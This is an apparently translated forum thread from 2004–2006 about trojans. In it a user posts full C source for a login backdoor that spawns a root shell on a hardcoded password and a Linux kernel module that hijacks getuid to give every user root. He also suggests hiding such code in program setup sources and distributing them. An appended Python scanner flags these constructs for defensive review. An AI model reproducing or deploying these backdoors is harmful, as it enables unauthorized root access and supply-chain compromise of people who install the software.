Straipsniai.lt • XP trojans

XP trojans

Posted: 2004 04 22 20:07
Administratorius
XP trojans

Posted: 2004 04 28 03:18
Marelis
Oh, how I adore Trojans, I have lots of them...

Posted: 2004 04 30 03:40
Zalias
And what do you do with them?

Posted: 2005 04 08 21:24
HaveNoName
Does sub7 work on XP?

Posted: 2006 04 28 22:54
Xgreem
Yes... on NT systems... you won't be able to use it on *nix.

Posted: 2006 06 12 20:11
GODhack
Read this: http://lwn.net/1998/1119/Trojan.html and you will stop thinking of *nix systems as unhackable.

Or this one:

Code:

/*
 * PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
 *	Universal login trojan by Tragedy/Dor
 *		Email: rawpower@iname.com
 *		IRC: [Dor]@ircnet
 *
 *	Login trojan for pretty much any O/S...
 *	Tested on:   Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
 *		     OSF1/DGUX4.0, 
 *	Known not to work on:
 *		SunOS 4.x and 5.4... Seems the only variable passwd to login
 *		on these versions of SunOS is the $TERM... and its passed via
 *		commandline option... should be easy to work round in time
 *
 *   #define         PASSWORD  - Set your password here
 *   #define         _PATH_LOGIN - This is where you moved the original login to
 *  login to hacked host with...
 *  from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host
 *
 */

#include        <stdio.h>
#if !defined(PASSWORD)
#define 	PASSWORD	"j4l0n3n"
#endif
#if !defined(_PATH_LOGIN)
# define                _PATH_LOGIN     "/bin/login"
#endif


main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
  if ( display == NULL ) {
        execve(_PATH_LOGIN, argv, envp);
        perror(_PATH_LOGIN);
        exit(1);
	}
  if (!strcmp(display,PASSWORD)) {
                system("/bin/sh");
        exit(1);
        }

        execve(_PATH_LOGIN, argv, envp);
        exit(1);
}


Or root status for all users:

Code:

/*
 * A kernel trojan (basic linux kernel module)
 *
 * Description: gives all users root
 *
 * 	coded by fred_ | blasphemy
 *
 *  Compile:	gcc -c -O3 all-root.c
 *  Load:	insmod all-root.o
 *  Unload:	rmmod all-root
 *
 *	email: cornoil@netscape.net
 */

#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <asm/fcntl.h>
#include <asm/errno.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <sys/mman.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/malloc.h>

extern void *sys_call_table[];

int (*orig_getuid)();

int give_root()
{
	int x;
	if (current->uid != 0) {
		current->uid = 0;
		current->gid = 0;
		current->euid = 0;
		current->egid = 0;
	  }
	return 0;
}

int init_module(void)
{
	orig_getuid = sys_call_table[SYS_getuid];
	sys_call_table[SYS_getuid] = give_root;

	return 0;
}

void cleanup_module(void)
{
	sys_call_table[SYS_getuid] = orig_getuid;
}

Code like this only needs to be mixed into the setup source of some program and put on the internet. Rarely does anyone read every line before installing a program on Linux, and there are no automated scripts.

These are just a couple of examples; by today maybe hundreds of these have been written.
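
An added example, not part of the original post: a heuristic triage scanner that flags the constructs the two samples above rely on (writes into `sys_call_table`, credentials set to 0, a `/bin/sh` spawn in code that reads the environment), so a reviewer knows which lines of a program's C source to read first before installing it. The rule names and the sample snippets are constructed for illustration, and a match is a lead for manual review, not proof.

```python
import re

# Comments are blanked first so commented-out code cannot trigger a rule.
# Simplification: a "//" inside a string literal is also treated as a comment.
COMMENT = re.compile(r"/\*.*?\*/|//[^\n]*", re.S)

# Constructed rule names; each pattern targets a construct from the samples above.
LINE_RULES = {
    "syscall-table-write": re.compile(r"sys_call_table\s*\[[^\]]+\]\s*=(?!=)"),
    "cred-set-to-root": re.compile(r"->\s*e?[ug]id\s*=(?!=)\s*0\b"),
    "shell-spawn": re.compile(r'\b(?:system|popen|exec[lv][pe]?)\s*\(\s*"/bin/(?:ba)?sh"'),
}

def strip_comments(src):
    """Blank out C comments but keep newlines so line numbers stay valid."""
    return COMMENT.sub(lambda m: "\n" * m.group().count("\n"), src)

def scan(src):
    """Return sorted (line_no, rule) findings; line 0 marks a file-level rule."""
    code = strip_comments(src)
    findings = [(no, name)
                for no, line in enumerate(code.splitlines(), 1)
                for name, rx in LINE_RULES.items() if rx.search(line)]
    # A shell spawn in a file that also reads the environment deserves a closer look.
    if "getenv" in code and any(rule == "shell-spawn" for _, rule in findings):
        findings.append((0, "env-gated-shell"))
    return sorted(findings)

# Constructed inputs modelled on the two samples in the post.
SAMPLE_MODULE = """\
/* sys_call_table[x] = y; inside a comment must not match */
int give_root() {
    if (current->uid != 0)
        current->uid = 0;
    return 0;
}
int init_module(void) {
    sys_call_table[SYS_getuid] = give_root;
    return 0;
}
"""
SAMPLE_LOGIN = 'char *d = getenv("DISPLAY");\nif (d && !strcmp(d, SECRET))\n    system("/bin/sh");\n'
SAMPLE_BENIGN = 'if (st.st_uid == 0 && p->gid != 0) return system("/bin/ls");\n'

if __name__ == "__main__":
    for label, text in [("module", SAMPLE_MODULE), ("login", SAMPLE_LOGIN), ("benign", SAMPLE_BENIGN)]:
        print(label, scan(text))
```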